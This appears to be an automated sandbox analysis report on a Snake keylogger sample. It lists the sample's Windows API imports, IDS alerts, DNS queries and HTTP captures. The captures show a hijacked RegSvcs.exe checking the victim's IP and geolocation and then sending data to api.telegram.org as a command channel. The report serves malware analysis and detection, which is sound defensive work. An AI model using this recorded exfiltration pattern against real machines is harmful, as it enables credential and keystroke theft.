KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T15:00:15.718231+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49705	193.122.6.168	80	TCP
2024-12-16T15:00:23.484007+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49705	193.122.6.168	80	TCP
2024-12-16T15:00:25.667261+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49707	149.154.167.220	443	TCP
2024-12-16T15:00:27.655736+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49708	193.122.6.168	80	TCP
2024-12-16T15:00:34.890125+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49708	193.122.6.168	80	TCP
2024-12-16T15:00:36.969725+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49731	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 15:00:12.852946997 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:12.972810030 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:12.972934961 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:12.973325014 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:13.093069077 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:15.239073992 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:15.247569084 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:15.367377996 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:15.668680906 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:15.718230963 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:16.082974911 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:16.083065033 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:16.083154917 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:16.107641935 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:16.107721090 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.337805033 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.337905884 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:17.375195026 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:17.375276089 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.376446962 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.421451092 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:17.484757900 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:17.531343937 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.825088024 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.825243950 CET	443	49706	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:17.825494051 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:17.842999935 CET	49706	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:23.003618002 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:23.123846054 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:23.429264069 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:23.484006882 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:23.632200003 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:23.632246017 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:23.632312059 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:23.632715940 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:23.632730961 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:24.800975084 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:24.921076059 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:24.921539068 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:24.922003984 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:25.020473957 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.020579100 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:25.023674011 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:25.023685932 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.024082899 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.026321888 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:25.041800022 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:25.067331076 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.069118023 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:25.069161892 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.667306900 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.667412043 CET	443	49707	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:25.667478085 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:25.667886019 CET	49707	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:27.193430901 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:27.196602106 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:27.316438913 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:27.606178045 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:27.640328884 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:27.640381098 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:27.640497923 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:27.644061089 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:27.644081116 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:27.655735970 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:28.878876925 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:28.878943920 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:28.880594015 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:28.880599976 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:28.881038904 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:28.936965942 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:28.945286036 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:28.991342068 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:29.327171087 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:29.327239037 CET	443	49712	104.21.67.152	192.168.2.5
Dec 16, 2024 15:00:29.327286005 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:29.330513000 CET	49712	443	192.168.2.5	104.21.67.152
Dec 16, 2024 15:00:34.403300047 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:34.523124933 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:34.843853951 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:00:34.850024939 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:34.850145102 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:34.850227118 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:34.850773096 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:34.850843906 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:34.890125036 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:00:36.233272076 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.233381987 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:36.234831095 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:36.234853029 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.235204935 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.243937969 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:36.287333965 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.287405968 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:36.287412882 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.969710112 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.969794035 CET	443	49731	149.154.167.220	192.168.2.5
Dec 16, 2024 15:00:36.969858885 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:00:36.970295906 CET	49731	443	192.168.2.5	149.154.167.220
Dec 16, 2024 15:01:28.428530931 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:01:28.428647041 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:01:39.832865953 CET	80	49708	193.122.6.168	192.168.2.5
Dec 16, 2024 15:01:39.833045959 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:01:57.846832037 CET	49705	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:01:57.970192909 CET	80	49705	193.122.6.168	192.168.2.5
Dec 16, 2024 15:02:09.343591928 CET	49708	80	192.168.2.5	193.122.6.168
Dec 16, 2024 15:02:09.463697910 CET	80	49708	193.122.6.168	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 15:00:12.346963882 CET	50780	53	192.168.2.5	1.1.1.1
Dec 16, 2024 15:00:12.844362020 CET	53	50780	1.1.1.1	192.168.2.5
Dec 16, 2024 15:00:15.746661901 CET	63548	53	192.168.2.5	1.1.1.1
Dec 16, 2024 15:00:16.082040071 CET	53	63548	1.1.1.1	192.168.2.5
Dec 16, 2024 15:00:23.492803097 CET	55077	53	192.168.2.5	1.1.1.1
Dec 16, 2024 15:00:23.631608009 CET	53	55077	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 15:00:12.346963882 CET	192.168.2.5	1.1.1.1	0xf07	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:15.746661901 CET	192.168.2.5	1.1.1.1	0x14f4	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:23.492803097 CET	192.168.2.5	1.1.1.1	0x7350	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 15:00:12.844362020 CET	1.1.1.1	192.168.2.5	0xf07	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 15:00:12.844362020 CET	1.1.1.1	192.168.2.5	0xf07	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:12.844362020 CET	1.1.1.1	192.168.2.5	0xf07	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:12.844362020 CET	1.1.1.1	192.168.2.5	0xf07	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:12.844362020 CET	1.1.1.1	192.168.2.5	0xf07	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:12.844362020 CET	1.1.1.1	192.168.2.5	0xf07	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:16.082040071 CET	1.1.1.1	192.168.2.5	0x14f4	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:16.082040071 CET	1.1.1.1	192.168.2.5	0x14f4	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 16, 2024 15:00:23.631608009 CET	1.1.1.1	192.168.2.5	0x7350	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	193.122.6.168	80	432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 15:00:12.973325014 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 15:00:15.239073992 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 31e614ad6ad26b8a11596add3373500f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 15:00:15.247569084 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 15:00:15.668680906 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c1cf93361625553edd3aed80de416ce Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 15:00:23.003618002 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 15:00:23.429264069 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1b058725127412627886c17517ceda56 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	193.122.6.168	80	4424	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 15:00:24.922003984 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 15:00:27.193430901 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 81d6212b76b4a412b9c6d92c97d4ea3f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 15:00:27.196602106 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 15:00:27.606178045 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 75053cfc09f20d107dec57d65d34dfce Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 15:00:34.403300047 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 15:00:34.843853951 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7c9b87b61172600d50cefd52c3a2b4a2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	104.21.67.152	443	432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 14:00:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
